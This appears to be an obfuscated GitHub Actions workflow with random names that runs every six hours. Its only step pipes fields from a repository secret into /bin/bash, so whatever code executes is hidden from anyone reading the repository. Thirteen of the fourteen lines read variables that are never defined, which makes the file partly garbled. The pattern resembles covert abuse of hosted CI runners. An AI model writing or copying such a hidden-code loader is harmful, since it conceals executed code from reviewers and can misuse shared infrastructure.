name: zhuganerx

on:
  workflow_dispatch:
  schedule:
    - cron: '16 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zhuganerx
        env:
          qoqk09: ${{ secrets.qoqk09 }}
        run: |
          echo $qoqk09 | jq -r .s9 | /bin/bash
          echo $rw778 | jq -r .i927 | /bin/bash
          echo $os50183 | jq -r .no032 | /bin/bash
          echo $rg9779 | jq -r .a5674 | /bin/bash
          echo $d838 | jq -r .w47062 | /bin/bash
          echo $hwgzr5941 | jq -r .k137 | /bin/bash
          echo $tcgu5 | jq -r .vt967 | /bin/bash
          echo $cro2 | jq -r .hzcf6957 | /bin/bash
          echo $bu32915 | jq -r .f97 | /bin/bash
          echo $bbr570 | jq -r .jm81 | /bin/bash
          echo $svmjp4470 | jq -r .jje201 | /bin/bash
          echo $zn3926 | jq -r .ddd5104 | /bin/bash
          echo $duzxp37 | jq -r .fhxnz52493 | /bin/bash
          echo $e7365 | jq -r .qdcel7 | /bin/bash

